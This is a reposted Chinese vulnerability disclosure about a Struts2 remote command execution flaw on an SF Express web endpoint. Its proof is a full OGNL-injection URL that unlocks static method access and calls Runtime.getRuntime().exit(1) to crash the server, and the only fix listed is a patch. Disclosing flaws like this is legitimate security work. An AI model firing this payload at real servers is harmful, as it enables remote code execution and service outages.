顺丰某频道命令执行漏洞 - 网站安全 - 自学php

struts2框架远程命令执行漏洞 http://sfocs.sf-express测试数据/im-client/imclient/selfHelp.action 漏洞证明： http://sfocs.sf-express测试数据/im-client/imclient/selfHelp.action;jsessionid=B4FB458446EE900494DC4936BD90F787?%28%27\u0023_memberAccess[\%27allowStaticMethodAccess\%27]%27%29%28meh%29=true&%28aaa%29%28%28%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003d\u0023foo%27%29%28\u0023foo\u003dnew%20java.lang.Boolean%28%22false%22%29%29%29&%28asdf%29%28%28%27\u0023rt.exit%281%29%27%29%28\u0023rt\u003d@java.lang.Runtime@getRuntime%28%29%29%29=1 修复方案：打补丁作者 kobin97

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://haodehen.cn/did13151

更新时间：2022-09-13 阅读：38次